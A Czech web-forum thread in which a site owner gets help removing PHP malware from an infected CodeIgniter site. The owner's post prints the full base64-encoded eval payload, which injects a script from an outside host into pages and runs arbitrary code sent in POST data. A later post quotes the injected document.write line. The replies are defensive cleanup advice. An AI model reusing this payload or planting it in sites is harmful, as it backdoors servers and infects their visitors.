Autor Zpráva
qwake
Profil *
Dobrý den,
včera jsem hledal problém na stránkách, které ukazovaly malware. Byl tam odkaz na nějaký šílený skript, tak jsem ho smazal. Udělal si zálohu - kterou mi antivir smazal. Když jsem se na stránky podíval, tak tam na mě čekala chyba.

Fatal error: Cannot redeclare q829() (previously declared in /var/www/web2/vprint.cz/vprint.cz/system/application/config/constants.php(1) : eval()'d code:1) in /var/www/web2/vprint.cz/vprint.cz/system/language/english/db_lang.php(1) : eval()'d code on line 1


Řádek, kde je prý chyba.
<?php eval(base64_decode('aWYoIWlzc2V0KCRxODI5MSkpe2Z1bmN0aW9uIHE4MjkoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXBabU52Ym5OMWJIUnBibWN1Ym1WMEwzUnRjQzl6WlhKMmFXTmxjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHE4MjkyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHE4MjkxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRxODI5MSkpY2FsbF91c2VyX2Z1bmMoJHE4MjkxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3E4MjknKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncTgyOScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRxODI5bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncTgyOTInKSkhPSdxODI5MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>


Nevíte, na jakou stránku to mohlo odkazovat?
Díky moc.
nightfish
Profil
qwake:
Nevíte, na jakou stránku to mohlo odkazovat?
http:// mifconsulting . net / tmp / services.php

Cannot redeclare q829() (previously declared in /var/www/web2/vprint.cz/vprint.cz/system/application/config/constants.php(1) : eval()'d code:1) in /var/www/web2/vprint.cz/vprint.cz/system/language/english/db_lang.php(1)
a vyčistil jsi i soubory constants.php a db_lang.php?
qwake
Profil *
Sice jsem nic nečistil, ale předtím to fungovalo...
nightfish
Profil
qwake:
Sice jsem nic nečistil, ale předtím to fungovalo...
To, že něco fungovalo, neznamená, že to kromě běžné funkce nedělalo i něco dalšího - např. zavirovávalo tvé návštěvníky.
Doporučuji mrknout na http://diskuse.jakpsatweb.cz/?action=vthread&forum=1&topic=96004
qwake
Profil *
V těch souborech chybu nevidím. (constants.php a db_lang.php)
Byly tam 2 nějaké řádky, ale vůbec netuším jaké. I přes přidání to nefunguje...
document.write(‘<script src=http://mifconsulting.net/tmp/services.php>');
nightfish
Profil
qwake:
Byly tam 2 nějaké řádky, ale vůbec netuším jaké
Pak je dost pravděpodobné, že tam neměly co dělat.

I přes přidání to nefunguje...
Nic nepřidávat, podezřelý kód vždy mazat.
Joker
Profil
qwake:
Já bych doporučoval nahrát celý web znovu ze zálohy, protože bůhví ve kterých souborech to všude je.

Není-li záloha, nechal bych globálně přes všechny soubory vyhledat „eval(“, s velkou pravděpodobností všechny výskyty budou ten virus.

Byly tam 2 nějaké řádky, ale vůbec netuším jaké. I přes přidání to nefunguje...
Přidání?! Něco jako manuální zavirování webu? :-)
qwake
Profil *
Já tímto spíše chtěl zjistit, jestli to bylo to, proč to nefunguje. Když jsem ten odkaz otevřel v prohlížeči, tak jsem dostal hned hlášení o malwaru... nějak jsem neplánoval ho tam znovu dávat, ale rád bych zjistil, jako co fungoval. Ten kód jsem nepsal já a moc se v něm ještě neorientuju.
nightfish
Profil
qwake:
Já tímto spíše chtěl zjistit, jestli to bylo to, proč to nefunguje
Ano, autor toho malwaru byl amatér, a tak dvakrát deklaroval funkci se stejným názvem (např. v důsledku includování jiného zavirovaného souboru). Smazáním všech těch eval(base64...) se příčina chyby napraví.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0